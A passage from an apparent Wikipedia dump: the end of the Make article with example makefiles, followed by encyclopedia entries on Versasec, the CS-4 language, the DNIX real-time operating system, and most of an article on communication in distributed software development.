$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^
clean: FRC
$(RM) helloworld helloworld.o
# This is an explicit suffix rule. It may be omitted on systems
# that handle simple rules like this automatically.
.c.o:
$(CC) $(CFLAGS) -c $<
FRC:
.SUFFIXES: .c
That "helloworld.o" depends on "helloworld.c" is now automatically handled by Make. In such a simple example as the one illustrated here this hardly matters, but the real power of suffix rules becomes evident when the number of source files in a software project starts to grow. One only has to write a rule for the linking step and declare the object files as prerequisites. Make will then implicitly determine how to make all the object files and look for changes in all the source files.
Simple suffix rules work well as long as the source files do not depend on each other or on other files such as header files. Another route to simplify the build process is to use so-called pattern matching rules that can be combined with compiler-assisted dependency generation. As a final example requiring the gcc compiler and GNU Make, here is a generic makefile that compiles all C files in a folder to the corresponding object files and then links them into the final executable. Before compilation takes place, dependencies are gathered in makefile-friendly format into a hidden file ".depend" that is then included into the makefile. Portable programs ought to avoid the constructs used below.
# Generic GNUMakefile
# Just a snippet to stop executing under other make(1) commands
# that won't understand these lines
ifneq (,)
This makefile requires GNU Make.
endif
PROGRAM = foo
C_FILES := $(wildcard *.c)
OBJS := $(patsubst %.c, %.o, $(C_FILES))
CC = cc
CFLAGS = -Wall -pedantic
LDFLAGS =
LDLIBS = -lm
all: $(PROGRAM)
$(PROGRAM): .depend $(OBJS)
$(CC) $(CFLAGS) $(OBJS) $(LDFLAGS) -o $(PROGRAM) $(LDLIBS)
depend: .depend
.depend: cmd = gcc -MM -MF depend $(var); cat depend >> .depend;
.depend:
@echo "Generating dependencies..."
@$(foreach var, $(C_FILES), $(cmd))
@rm -f depend
-include .depend
# These are the pattern matching rules. In addition to the automatic
# variables used here, the variable $* that matches whatever % stands for
# can be useful in special cases.
%.o: %.c
$(CC) $(CFLAGS) -c $< -o $@
%: %.o
$(CC) $(CFLAGS) -o $@ $<
clean:
rm -f .depend $(OBJS)
.PHONY: clean depend
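A typical session with the generic makefile above might look like this (output omitted):
make          # generate .depend, compile every .c file and link the foo executable
make clean    # remove the object files and the generated .depend file
make depend   # regenerate only the dependency information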
See also
List of build automation software
Dependency graph
References
External links
GNU Make homepage
Practical Makefiles, by Example
Writing and Debugging a Makefile
"Ask Mr. Make" series of article about GNU Make
Managing Projects with GNU make -- 3.xth edition
What is wrong with make?
What’s Wrong With GNU make?
Recursive Make Considered Harmful
Advanced Auto-Dependency Generation.
Using NMake
Make7 - A portable open source make utility written in Seed7
Microsoft's NMAKE predefined rules.
Articles with example code
Build automation
Compiling tools
GNU Project software
Unix programming tools
Unix SUS2008 utilities
|
48954135
|
https://en.wikipedia.org/wiki/Versasec
|
Versasec
|
Versasec AB (registration number: 556739–0124) was founded in 2007 in Stockholm, Sweden. The company produces and sells identity management software for computer security and has specialized in software connecting smart cards to computer systems.
Versasec has developed three product lines:
vSEC:CMS – credential or smart card management systems for managing PKI tokens, smart cards and digital certificates, generally with the intention to use the credentials as identification tokens and badges in organizations to enable multi-factor authentication and non-repudiation
vSEC:ID – software for enabling public key operations using smart cards in organizations, for example to use digital signatures
vSEC:MAIL – software that enables organizations to communicate using encrypted and/or digitally signed email messages
The company has a partnership with Thales CPL (previously Gemalto). The Versasec-Thales partnership began in 2010, and enables the company to offer its products through the Thales partner network. Thales offers vSEC:CMS as part of their product portfolio.
Versasec currently has offices in the following countries:
Sweden - (Headquarters, Versasec AB, Stockholm and Uppsala)
Germany - (Research center, Merseburg)
United Kingdom - (Versasec LTD, Portsmouth)
United States - (Versasec LLC, Austin, TX)
Malaysia - (Asia-Pacific Sales and Services, Kuala Lumpur)
Egypt - (Middle East Sales and Services, Cairo)
During its first four years, Versasec was self-financed. In 2011 the company conducted its first round of financing, raising capital from investors in Sweden, including Almi Invest and Stockholms Affärsänglar (STOAF).
Versasec has been awarded the Dagens industri (Di) Gasell award three years in a row (2017, 2018 and 2019), recognizing Versasec as one of the fastest-growing profitable companies in Sweden.
External links
Versasec versasec.com
Versasec Partner Network
Notes
Smart cards
Software companies established in 2007
Companies based in Stockholm
Swedish companies established in 2007
Software companies of Sweden
|
51237175
|
https://en.wikipedia.org/wiki/CS-4%20%28programming%20language%29
|
CS-4 (programming language)
|
CS-4 is a programming language and an operating system interface. It was developed in the early 1970s at Intermetrics in Cambridge, Massachusetts. The first published manual was released in December 1973, entitled "CS-4 Language Reference Manual and Operating System Interface". The document had three parts: CS-4 Base Language Capabilities; CS-4 Operating System Interface; and Overview of Full CS-4 Capabilities.
History
Little is known about the CS-4 language, but it was developed for the United States Navy in the 1970s as an ongoing research project that continued the study of extensibility and abstraction techniques; a stated requirement was for the language to be simple and compact. The language was first documented in 1973 by Miller et al., and was revised in 1975 to allow "data abstractions and more powerful extension facilities".
Descendants
Praxis explicitly refers to CS-4 as a predecessor language.
References
Procedural programming languages
Programming languages created in 1973
Concurrent programming languages
Systems programming languages
|
51172
|
https://en.wikipedia.org/wiki/DNIX
|
DNIX
|
DNIX (original spelling: D-Nix) is a discontinued Unix-like real-time operating system from the Swedish company Dataindustrier AB (DIAB). A version called ABCenix was also developed for the ABC 1600 computer from Luxor. (Daisy Systems also had something called Daisy DNIX on some of their CAD workstations. It was unrelated to DIAB's product.)
History
Inception at DIAB in Sweden
Dataindustrier AB (literal translation: computer industries shareholding company) was started in 1970 by Lars Karlsson as a single-board computer manufacturer in Sundsvall, Sweden, producing a Zilog Z80-based computer called Data Board 4680. In 1978 DIAB started to work with the Swedish television company Luxor AB to produce the home and office computer series ABC 80 and ABC 800.
In 1983 DIAB independently developed the first UNIX-compatible machine, DIAB DS90 based on the Motorola 68000 CPU. D-NIX here made its appearance, based on a UNIX System V license from AT&T. DIAB was however an industrial automation company, and needed a real-time operating system, so the company replaced the AT&T-supplied UNIX kernel with their own in-house developed, yet compatible real-time variant. This kernel was originally a Z80 kernel called OS8.
Over time, the company also replaced several of the UNIX standard userspace tools with their own implementations, to the point where no code was derived from UNIX, and their machines could be deployed independently of any AT&T UNIX license. Two years later and in cooperation with Luxor, a computer called ABC 1600 was developed for the office market, while in parallel DIAB continued to produce enhanced versions of the DS90 computer using newer versions of the Motorola CPUs such as Motorola 68010, 68020, 68030 and eventually 68040. In 1990 DIAB was acquired by Groupe Bull, who continued to produce and support the DS machines under the brand name DIAB, with names such as DIAB 2320, DIAB 2340 etc., still running DIAB's version of DNIX.
Derivative at ISC Systems Corporation
ISC Systems Corporation (ISC) purchased the right to use DNIX in the late 1980s for use in its line of Motorola 68k-based banking computers. (ISC was later bought by Olivetti, and was in turn resold to Wang, which was then bought by Getronics. This corporate entity, most often referred to as 'ISC', has answered to a bewildering array of names over the years.) This code branch was the SVR2 compatible version, and received extensive modification and development at their hands. Notable features of this operating system were its support of demand paging, diskless workstations, multiprocessing, asynchronous I/O, the ability to mount processes (handlers) on directories in the file system, and message passing. Its real-time support consisted largely of internal event-driven queues rather than list search mechanisms (no 'thundering herd'), static process priorities in two classes (run to completion and timesliced), support for contiguous files (to avoid fragmentation of critical resources), and memory locking. The quality of the orthogonal asynchronous event implementation has yet to be equalled in current commercial operating systems, though some approach it. (The concept that has yet to be adopted is that the synchronous marshalling point of all the asynchronous activity itself could be asynchronous, ad infinitum. DNIX handled this with aplomb.) The asynchronous I/O facility obviated the need for Berkeley sockets select or SVR4's STREAMS poll mechanism, though there was a socket emulation library that preserved the socket semantics for backward compatibility. Another feature of DNIX was that none of the standard utilities (such as ps, a frequent offender) rummaged around in the kernel's memory to do their job. System calls were used instead, and this meant the kernel's internal architecture was free to change as required. The handler concept allowed network protocol stacks to be outside the kernel, which greatly eased development and improved overall reliability, though at a performance cost. It also allowed for foreign file systems to be user-level processes, again for improved reliability. The main file system, though it could have been (and once was) an external process, was pulled into the kernel for performance reasons. Were it not for this DNIX could well have been considered a microkernel, though it was not formally developed as such. Handlers could appear as any type of 'native' Unix file, directory structure, or device, and file I/O requests that the handler itself could not process could be passed off to other handlers, including the underlying one upon which the handler was mounted. Handler connections could also exist and be passed around independent of the filesystem, much like a pipe. One effect of this is that TTY-like 'devices' could be emulated without requiring a kernel-based pseudo terminal facility.
An example of where a handler saved the day was in ISC's diskless workstation support, where a bug in the implementation meant that using named pipes on the workstation could induce undesirable resource locking on the fileserver. A handler was created on the workstation to field accesses to the afflicted named pipes until the appropriate kernel fixes could be developed. This handler required approximately 5 kilobytes of code to implement, an indication that a non-trivial handler did not need to be large.
ISC also received the right to manufacture DIAB's DS90-10 and DS90-20 machines as its file servers. The multiprocessor DS90-20's, however, were too expensive for the target market and ISC designed its own servers and ported DNIX to them. ISC designed its own GUI-based diskless workstations for use with these file servers, and ported DNIX again. (Though ISC used Daisy workstations running Daisy DNIX to design the machines that would run DIAB's DNIX, there was negligible confusion internally as the drafting and layout staff rarely talked to the software staff. Moreover, the hardware design staff didn't use either system! The running joke went something like: "At ISC we build computers, we don't use them.") The asynchronous I/O support of DNIX allowed for easy event-driven programming in the workstations, which performed well even though they had relatively limited resources. (The GUI diskless workstation had a 7 MHz 68010 processor and was usable with only 512K of memory, of which the kernel consumed approximately half. Most workstations had 1 MB of memory, though there were later 2 MB and 4 MB versions, along with 10 MHz processors.) A full-blown installation could consist of one server (16 MHz 68020, 8 MB of RAM, and a 200 MB hard disk) and up to 64 workstations. Though slow to boot up, such an array would perform acceptably in a bank teller application. Besides the innate efficiency of DNIX, the associated DIAB C compiler was key to high performance. It generated particularly good code for the 68010, especially after ISC got done with it. (ISC also retargeted it to the Texas Instruments TMS34010 graphics coprocessor used in its last workstation.) The DIAB C compiler was, of course, used to build DNIX itself which was one of the factors contributing to its efficiency, and is still available (in some form) through Wind River Systems.
As of 2006, these systems were still in use in former Seattle-First National Bank branches, now branded Bank of America. There may be, and probably are, other ISC customers still using DNIX in some capacity. Through ISC there was a considerable DNIX presence in Central and South America.
Asynchronous events
DNIX's native system call was the dnix(2) library function, analogous to the standard Unix unix(2) or syscall(2) function. It took multiple arguments, the first of which was a function code. Semantically this single call provided all appropriate Unix functionality, though it was syntactically different from Unix and had, of course, numerous DNIX-only extensions.
DNIX function codes were organized into two classes: Type 1 and Type 2. Type 1 commands were those that were associated with I/O activity, or anything that could potentially cause the issuing process to block. Major examples were F_OPEN, F_CLOSE, F_READ, F_WRITE, F_IOCR, F_IOCW, F_WAIT, and F_NAP. Type 2 were the remainder, such as F_GETPID, F_GETTIME, etc. They could be satisfied by the kernel itself immediately.
To invoke asynchronicity, a special file descriptor called a trap queue had to have been created via the Type 2 opcode F_OTQ. A Type 1 call would have the F_NOWAIT bit OR-ed with its function value, and one of the additional parameters to dnix(2) was the trap queue file descriptor. The return value from an asynchronous call was not the normal value but a kernel-assigned identifier. At such time as the asynchronous request completed, a read(2) (or F_READ) of the trap queue file descriptor would return a small kernel-defined structure containing the identifier and result status. The F_CANCEL operation was available to cancel any asynchronous operation that hadn't yet been completed, one of its arguments was the kernel-assigned identifier. (A process could only cancel requests that were currently owned by itself. The exact semantics of cancellation was up to each request's handler, fundamentally it only meant that any waiting was to be terminated. A partially completed operation could be returned.) In addition to the kernel-assigned identifier, one of the arguments given to any asynchronous operation was a 32-bit user-assigned identifier. This most often referenced a function pointer to the appropriate subroutine that would handle the I/O completion method, but this was merely convention. It was the entity that read the trap queue elements that was responsible for interpreting this value.
struct itrq { /* Structure of data read from trap queue. */
short it_stat; /* Status */
short it_rn; /* Request number */
long it_oid; /* Owner ID given on request */
long it_rpar; /* Returned parameter */
};
Of note is that the asynchronous events were gathered via normal file descriptor read operations, and that such reading was itself capable of being made asynchronous. This had implications for semi-autonomous asynchronous event handling packages that could exist within a single process. (DNIX 5.2 did not have lightweight processes or threads.) Also of note is that any potentially blocking operation was capable of being issued asynchronously, so DNIX was well equipped to handle many clients with a single server process. A process was not restricted to having only one trap queue, so I/O requests could be grossly prioritized in this way.
Compatibility
In addition to the native dnix(2) call, a complete set of 'standard' libc interface calls was available.
open(2), close(2), read(2), write(2), etc. Besides being useful for backwards compatibility, these were implemented in a binary-compatible manner with the NCR Tower computer, so that binaries compiled for it would run unchanged under DNIX. The DNIX kernel had two trap dispatchers internally, one for the DNIX method and one for the Unix method. Choice of dispatcher was up to the programmer, and using both interchangeably was acceptable. Semantically they were identical wherever functionality overlapped. (In these machines the 68000 trap #0 instruction was used for the unix(2) calls, and the trap #4 instruction for dnix(2). The two trap handlers were really quite similar, though the [usually hidden] unix(2) call held the function code in the processor's D0 register, whereas dnix(2) held it on the stack with the rest of the parameters.)
DNIX 5.2 had no networking protocol stacks internally (except for the thin X.25-based Ethernet protocol stack added by ISC for use by its diskless workstation support package), all networking was conducted by reading and writing to Handlers. Thus, there was no socket mechanism, but a libsocket(3) existed that used asynchronous I/O to talk to the TCP/IP handler. The typical Berkeley-derived networking program could be compiled and run unchanged (modulo the usual Unix porting problems), though it might not be as efficient as an equivalent program that used native asynchronous I/O.
Handlers
Under DNIX, a process could be used to handle I/O requests and to extend the filesystem. Such a process was called a Handler, and was a major feature of the operating system. A handler was defined as a process that owned at least one request queue, a special file descriptor that was procured in one of two ways: with a F_ORQ or a F_MOUNT call. The former invented an isolated request queue, one end of which was then typically handed down to a child process. (The network remote execution programs, of which there were many, used this method to provide standard I/O paths to their children.) The latter hooked into the filesystem so that file I/O requests could be adopted by handlers. (The network login programs, of which there were even more, used this method to provide standard I/O paths to their children, as the semantics of logging in under Unix requires a way for multiple perhaps-unrelated processes to horn in on the standard I/O path to the operator.) Once mounted on a directory in the filesystem, the handler then received all I/O calls to that point.
A handler would then read small kernel-assigned request data structures from the request queue. (Such reading could be done synchronously or asynchronously as the handler's author desired.) The handler would then do whatever each request required to be satisfied, often using the DNIX F_UREAD and F_UWRITE calls to read and write into the request's data space, and then would terminate the request appropriately using F_TERMIN. A privileged handler could adopt the permissions of its client for individual requests to subordinate handlers (such as the filesystem) via the F_T1REQ call, so it didn't need to reproduce the subordinate's permission scheme. If a handler was unable to complete a request itself, the F_PASSRQ function could be used to pass I/O requests from one handler to another. A handler could perform part of the work requested before passing the rest on to another handler. It was very common for a handler to be state-machine oriented so that requests it was fielding from a client were all done asynchronously. This allowed for a single handler to field requests from multiple clients simultaneously without them blocking each other unnecessarily. Part of the request structure was the process ID and its priority so that a handler could choose what to work on first based upon this information, there was no requirement that work be performed in the order it was requested. To aid in this, it was possible to poll both request and trap queues to see if there was more work to be considered before buckling down to actually do it.
struct ireq { /* Structure of incoming request */
short ir_fc; /* Function code */
short ir_rn; /* Request number */
long ir_opid; /* Owner ID that you gave on open or mount */
long ir_bc; /* Byte count */
long ir_upar; /* User parameter */
long ir_rad; /* Random address */
ushort ir_uid; /* User ID */
ushort ir_gid; /* User group */
time_t ir_time; /* Request time */
ulong ir_nph;
ulong ir_npl; /* Node and process ID */
};
There was no particular restriction on the number of request queues a process could have. This was used to provide networking facilities to chroot jails, for example.
Examples
To give some appreciation of the utility of handlers, at ISC handlers existed for:
foreign filesystems
FAT
CD-ROM/ISO9660
disk image files
RAM disk (for use with write-protected boot disks)
networking protocols
DNET (essentially X.25 over Ethernet, with multicast capability)
X.25
TCP/IP
DEC LAT
AppleTalk
remote filesystems
DNET's /net/machine/path/from/its/root...
NFS
remote login
ncu (DNET)
telnet
rlogin
wcu (DNET GUI)
X.25 PAD
DEC LAT
remote execution
rx (DNET)
remsh
rexec
system extension
windowman (GUI)
vterm (xterm-like)
document (passbook) printer
dmap (ruptime analog)
windowmac (GUI gateway to Macintosh)
system patches
named pipe handler
ISC's extensions
ISC purchased both 5.2 (SVR2 compatible) and 5.3 (SVR3 compatible) versions of DNIX. At the time of purchase, DNIX 5.3 was still undergoing development at DIAB so DNIX 5.2 was what was deployed. Over time, ISC's engineers incorporated most of their 5.3 kernel's features into 5.2, primarily shared memory and IPC, so there was some divergence of features between DIAB and ISC's versions of DNIX. DIAB's 5.3 likely went on to contain more SVR3 features than ISC's 5.2 ended up with. Also, DIAB went on to DNIX 5.4, a SVR4 compatible OS.
At ISC, developers considerably extended their version of DNIX 5.2 (only listed are features involving the kernel itself) based upon both their needs and the general trends of the Unix industry:
Diskless workstation support. The workstation's kernel filesystem was removed, and replaced with an X.25-based Ethernet communications stub. The file server's kernel was also extended with a mating component that received the remote requests and handed them to a pool of kernel processes for service, though a standard handler could have been written to do this. (Later in its product lifecycle, ISC deployed standard SVR4-based Unix servers in place of the DNIX servers. These used X.25 STREAMS and a custom-written file server program. In spite of the less efficient structuring, the raw horsepower of the platforms used made for a much faster server. It is unfortunate that this file server program did not support all of the functionality of the native DNIX server. Tricky things, like named pipes, never worked at all. This was another justification for the named pipe handler process.)
gdb watchpoint support using the features of ISC's MMU.
Asynchronous I/O to the filesystem was made real. (Originally it blocked anyway.) Kernel processes (kprocs, or threads) were used to do this.
Support for a truss- or strace-like program. In addition to some repairs to bugs in the standard Unix ptrace single-stepping mechanism, this required adding a temporary process adoption facility so that the tracer could use the standard single-stepping mechanism on existing processes.
SVR4 signal mechanism extensions. Primarily for the new STOP and CONT signals, but encompassing the new signal control calls as well. Due to ISC's lack of source code for the adb and sdb debuggers the u-page could not be modified, so the new signals could only be blocked or receive default handling, they could not be caught.
Support for network sniffing. This required extending the Ethernet driver so that a single event could satisfy more than one I/O request, and conditionally implementing the hardware filtering in software to support promiscuous mode.
Disk mirroring. This was done in the filesystem and not the device driver, so that slightly (or even completely) different devices could still be mirrored together. Mirroring a small hard disk to the floppy was a popular way to test mirroring as ejecting the floppy was an easy way to induce disk errors.
32-bit inode, 30-character filename, symbolic link, and sticky directory extensions to the filesystem. Added /dev/zero, /dev/noise, /dev/stdXXX, and /dev/fd/X devices.
Process group id lists (from SVR4).
#! direct script execution.
Serial port multiplication using ISC's Z-80 based VMEbus communications boards.
Movable swap partition.
Core 'dump' snapshots of running processes. Support for fuser command.
Process renice function. Associated timesharing reprioritizer program to implement floating priorities.
A way to 'mug' a process, instantly depriving it of all memory resources. Very useful for determining what the current working set is, as opposed to what is still available to it but not necessarily being used. This was associated with a GUI utility showing the status of all 1024 pages of a process's memory map. (This being the number of memory pages supported by ISC's MMU.) In use you would 'mug' the target process periodically through its life and then watch to see how much memory was swapped back in. This was useful as ISC's production environment used only a few long-lived processes, controlling their memory utilization and growth was key to maintaining performance.
Features that were never added
When DNIX development at ISC effectively ceased in 1997, a number of planned OS features were left on the table:
Shared objects - There were two dynamically loaded libraries in existence, an encryptor for DNET and the GUI's imaging library, but the facility was never generalized. ISC's machines were characterized by a general lack of virtual address space, so extensive use of memory-mapped entities would not have been possible.
Lightweight processes - The kernel itself already had multiple threads that shared a single MMU context, extending this to user processes should have been straightforward. The API implications would have been the most difficult part of this.
Access Control Lists - Trivial to implement using an ACL handler mounted over the stock filesystem.
Multiple swap partitions - DNIX already used free space on the selected volume for swapping, it would have been easy to give it a list of volumes to try in turn, potentially with associated space limits to keep it from consuming all free space on a volume before moving on to the next one.
Remote kernel debugging via gdb - All the pieces were there to do it either through the customary serial port or over Ethernet using the kernel's embedded X.25 link software, but they were never assembled.
68030 support - ISC's prototypes were never completed. Two processor piggyback plug-in cards were built, but were never used as more than faster 68020's. They were not reliable, nor were they as fast as they could have been due to having to fit into a 68020 socket. The fast context switching ISC MMU would be left disabled (and left out altogether in proposed production units), and the embedded one of the 68030 was to have been used instead, using a derivative of the DS90-20's MMU code. While the ISC MMU was very efficient and supported instant switching among 32 resident processes, it was very limited in addressability. The 68030 MMU would have allowed for much more than 8 MB of virtual space in a process, which was the limit of the ISC MMU. Though this MMU would be slower, the overall faster speed of the 68030 should have more than made up for it, so that a 68030 machine was expected to be in all ways faster, and support much larger processes.
See also
Timeline of operating systems
Cromemco Cromix
References
UNIX System V
Real-time operating systems
|
54305815
|
https://en.wikipedia.org/wiki/Communication%20in%20distributed%20software%20development
|
Communication in distributed software development
|
Communication in Distributed Software Development is an area of study that considers communication processes and their effects when applied to software development in a globally distributed development process. The importance of communication and coordination in software development is widely studied and organizational communication studies these implications at an organizational level. This also applies to a setting where teams and team members work in separate physical locations. The imposed distance introduces new challenges in communication, which is no longer a face to face process, and may also be subjected to other constraints such as teams in opposing time zones with a small overlap in working hours.
There are several reasons that force elements from the same project to work in geographically separated areas, ranging from different teams in the same company to outsourcing and offshoring, to which different constraints and necessities in communication apply. The added communication challenges result in the adoption of a wide range of different communication methods usually used in combination. They can either be in real time as in the case of a video conference, or in an asynchronous way such as email. While a video conference might allow the developers to be more efficient with regards to their time spent communicating, it is more difficult to accomplish when teams work in different time zones, in which case using an email or a messaging service might be more useful.
History
The history of communication in distributed software development is tied to the historical setting of distributed development itself. Communication tools helped in advancing the distributed development process, since communication was the principal missing component in early attempts at distributed software development. One of the main factors in the creation of new tools, and in making distributed development a viable methodology, was the introduction of the Internet as an accessible platform for developers and researchers, facilitating the exchange of both code and information within a team.
One of the first manifestations of distributed development is the open-source community, where developers are joined together not by an enterprise and its resources but by voluntary participation in the same project, resulting in diverse teams from different geographical locations. In these projects there is a pressing need for communication and collaboration tools. The history of free and open-source software shows that, as time progressed, the complexity of the projects and the number of people involved increased. Better communication and collaboration tools played an important role in this growth. Initially the available methods were mostly asynchronous forms of communication, such as email and mailing lists, or even relied on periodical written publications to spread information. Synchronous communication was mostly limited to telephone calls.
In this early stage there are not many accounts of this kind of distributed development in an enterprise setting. However, the developments and tools of previous years pioneered the means necessary for companies to start investigating and adopting these practices where advantages could be obtained. More tools, such as audio conferencing and instant messaging, appeared mostly for other purposes but were quickly adopted, and continued to push forward the idea of distributed development. This new movement created interest in the area of study that is communication in distributed software development, aiming to further improve the effectiveness and quality of the development process.
Importance
Software development, in general, requires a great deal of information exchange, and studies show that a great percentage of a developer's time is spent on collaborative and communication activities. While formal communication is used for essential tasks such as updating a project status or determining who has responsibility for a particular piece of work, informal communication is also crucial for the development process. Informal communication, or "corridor talk", helps developers stay aware of what is going on around them, what other employees are working on, who has expertise in what area, and many other essential pieces of background information that enable them to work together efficiently and create the "spirit of a team". Studies also show that the more uncertain a project is, the more important this kind of communication becomes.
In a global software engineering (GSE) environment, informal communication is hard to recreate. The lack of this type of communication can lead to surprises, resulting in misalignment and rework. For this reason, communication in distributed software development is important for any company applying GSE. This area of study, among other things, tries to recreate informal communication in a GSE environment, in order to develop software without the loss of development speed that is characteristic of this environment.
Challenges
Communication can be hindered by several barriers, such as socio-cultural, linguistic, knowledge, geographical and temporal barriers.
Socio-cultural barriers can manifest themselves as the means of communication. In fact, a study shows that U.S. and Japanese clients have distinct preferences with regards to them. U.S. clients prefer to communicate frequently via informal telephone and email contacts, while Japanese clients prefer verbal communication and less frequent but formal use of electronic media.
Linguistic barriers typically manifest themselves when at least one of the actors in a conversation is not speaking their native language. Aside from the fact that people can usually express themselves better in their native language, there are other obstacles: idiomatic expressions and slang are examples of obstacles that hinder informal communication.
According to Allen's Curve, the frequency of communication between engineers drops at an exponential rate as the distance between them increases. In the case of coworkers in a company, communication is often triggered by random encounters between them; when there is a significant distance between coworkers, their communication decreases. An empirical study compared the frequency of communication between coworkers at local and remote sites: most of those surveyed answered that they speak to the majority of their local colleagues at least once a day, while speaking with their remote colleagues less than once a week.
Temporal barriers are closely related to geographical barriers. Temporal barriers are typically present on a scenario where two or more coworkers are in different time zones and oftentimes in different geographic locations. Developers mostly communicate during work hours, and while they can use asynchronous communication which doesn't require overlapping work hours, it inherently delays the communication process. As an alternative they can use synchronous communication if they need to communicate in real time, however it introduces the complication of finding overlapping work hours. Follow-the-sun is a common approach taken by software companies to mitigate the latter issue.
Research
Research on Communication in Distributed Software Development is conducted in order to improve the understanding of the implications of different communication methods on the success of the development process and the final product.
Communication is an essential process in coordinating a software development project and sharing knowledge between the team members. Previous studies claim that sharing knowledge is important to building trust and even improving the performance of the whole team, which also applies in a distributed software development process.
Communication can also bring challenges, as noted in the section above, which, when improperly dealt with, can delay a team's project or even cost the company money. A great deal of research tries to find ways to mitigate these problems and avoid miscommunication.
The tools used for communication are within the scope of some studies. These show the advantages and disadvantages of different types of tools, as well as which kinds of tools developers prefer to use in particular situations.
The interest of researchers in how globally distributed development influences the success of a project is noted in publications whose authors mention the need for more empirical studies on the subject. Another study tried to find more direct relations between time zones and language barriers without significant results, which, as suggested by the author, might be due to the low sample size. However, it was shown that there is indeed a relationship between distributed development and longer response times between collaborators. There are also studies, such as those behind the Allen curve, that correlate the frequency of communication with geographical distance.
The research done so far points to the need to improve the methodologies and tools used by companies, and indicates that communication is a major factor in a company's success.
Forms of communication
Communication in a collaboration setting can be achieved either synchronously or asynchronously, the two differing in how the participants interact with each other. The different forms of communication give rise to corresponding communication systems and tools, which serve different purposes in a distributed development setting. Even inside a company, the tasks and responsibilities of different members are reflected in the tools they use in the work environment.
Synchronous systems
In synchronous systems, the participants simultaneously receive and send information in "real time", and a message is usually followed by a response in a short time span. This type of communication is used for communication that requires an immediate response when the other participant is promptly available or for more informal communication in a direct setting. It can be used in an enterprise to answer questions quickly, discuss ideas, convey important developments that need attention or any other important message.
Asynchronous systems
Asynchronous systems provide a mechanism for the submission and retrieval of messages, where the sender can send information at any time and the recipient retrieves and replies to it when available. This form of communication can be used to hold a discussion or convey information about less urgent matters, since no prompt answer is guaranteed. It is especially useful in a distributed development process because the different teams working on a project often do not work at the same time, and matters that are not urgent can be discussed asynchronously.
Hybrid systems
There is also a third approach in which a system provides both forms of communication in the same environment to allow more flexibility. These are referred to as hybrid systems: the messages exchanged usually have the characteristics of asynchronous messages, but the systems are designed so that the same messages can also serve as a form of synchronous communication. They present a middle ground between asynchronous and synchronous communication.
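The distinction can be illustrated with a short, tool-agnostic sketch; the function and variable names below are purely illustrative and are not taken from any of the systems discussed in this article.

```python
# Illustrative sketch of the two communication forms (names are hypothetical).
# Asynchronous: the message is stored until the recipient comes online.
# Synchronous: the sender waits for a reply in real time.
import queue
import threading
import time

inbox = queue.Queue()  # stands in for an asynchronous channel (e.g. email)

def send_async(message):
    inbox.put(message)  # delivery does not require the recipient to be online

def recipient_comes_online_later():
    time.sleep(1)  # e.g. the recipient's workday starts in another time zone
    while not inbox.empty():
        print("recipient read:", inbox.get())

def send_sync(message, respond):
    # stands in for a real-time channel (e.g. a call): reply before continuing
    return respond(message)

if __name__ == "__main__":
    send_async("Please review the design document when you start your day.")
    worker = threading.Thread(target=recipient_comes_online_later)
    worker.start()
    reply = send_sync("Is the build passing?", lambda m: "Yes, it is.")
    print("immediate reply:", reply)
    worker.join()
```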
Tools
Communication tools for globally distributed software engineering come in various types that differ in the communication form used and the interface provided to the user, among other aspects. Different categories of tools can also use different sensory information to improve communication. The tools available include instant messaging, email, audio and video conferencing, virtual offices and virtual reality. This section provides an overview of the different types of tools and some popular examples currently in use; it is not an exhaustive listing of available tools, and more complete listings can be found in other resources.
Asynchronous tools
Email
Email is a method of exchanging digital messages between people using digital devices such as computers, mobile phones and other electronics. Unlike most instant messaging tools, email does not require the users or their computers to be online simultaneously. The cost of using email within a company varies, since, for example, the company might run its own email server.
Empirical studies found that email was used effectively by all members of a software development team. Unlike instant messages, email messages are intended to be more self-contained and less dependent on the context of the conversation, so composing an email typically takes more time than writing a typical IM message.
Some email providers are Gmail, Outlook.com and ProtonMail.
Synchronous tools
Audio and video conference
Audio and video conferencing are technologies for the reception and transmission of audio and video signals by users at different locations, allowing people to communicate in real time. These types of tools attempt to replicate the rich interaction present in face-to-face meetings. Rich synchronous communication technology such as video conferencing is appropriate for highly interactive discussions, where body language and intonation can convey the degree of understanding or agreement among participants.
Video conference is also a good way to develop trust among global software developers, since it allows team members to form personal relationships.
Researchers found that team members who are not confident in their English language skills prefer to use email or instant messaging over audio and video conferencing, as text-based media give them more time to comprehend messages and compose a response. This can become a problem, since text-based media lack both auditory and visual cues, which can hinder the understanding of important information and lead to misunderstandings.
Zoom, GoToMeeting and Highfive are examples of this type of tool.
Virtual Offices
Virtual offices recreate the personal proximity and functionality of a physical office needed by teams in a globally distributed software engineering environment. Instead of having "channels" or "message threads", virtual offices have rooms in a virtual office space.
In the late 1970s, Professor Thomas J. Allen found that the frequency of communication between engineers decreases exponentially as the distance between them increases. Virtual offices are a way to virtually reduce that distance and thereby increase communication.
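This relationship, often referred to as the Allen curve, is commonly summarised, as a rough approximation rather than Allen's exact published fit, by an exponential decay of communication frequency with distance:

$$ f(d) \approx f_0 \, e^{-d/d_0} $$

where $f_0$ is the communication frequency between co-located engineers and $d_0$ is a characteristic distance beyond which communication becomes rare.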
Furthermore, other studies show that virtual offices make work coordination easier and improve team performance.
Some tools that belong to this subset are Sococo, 8x8 and Skype for Business.
Virtual Reality
Virtual reality has gained increasing interest over the years. It grew from an industry of 129 million USD in 2015 to over 1 billion USD by the end of 2016, and was estimated to reach 4.6 billion USD by the end of 2018.
The content exchanged during communication consists of the participants' interpretations of the situations in which they are involved, which in turn depend on the context. The motivation for using virtual reality as a communication tool is based on the premise that one's perception of context is proportional to the sensory information available.
In a virtual reality communication setup, each participant is sensorially immersed. This improves their perception of the context they are in, which in turn improves the communication experience itself.
Even though the concept is not new, the technology only began to see significant development around 2010.
AltspaceVR is an example of a virtual reality platform which was recently used as a communication tool.
Hybrid tools
Instant Messaging
Instant messaging (IM) allows the transmission of messages between two parties, or more in the case of a "chat room". It can be synchronous or asynchronous and is considered the least intrusive communication type. Research shows that developers like to use this type of tool to ask quick questions of their peers or superiors.
WhatsApp, Facebook Messenger and HipChat are examples of this type of tool.
Applications in software processes
Agile
Mixing agile software development and distributed software development brings many challenges to team communication. On one hand, agile software development demands more informal communication and de-emphasizes formal communication, such as documentation. On the other hand, distributed software development makes it harder to initiate communication, can lead to misunderstandings and increases the cost of communication (time, money, etc.), as explained previously in #Challenges, which can reduce the frequency of communication. This makes the area of study presented here particularly important in distributed agile software development, since one of its core principles emphasizes individuals and their interactions, entailing constant communication.
Extreme Programming
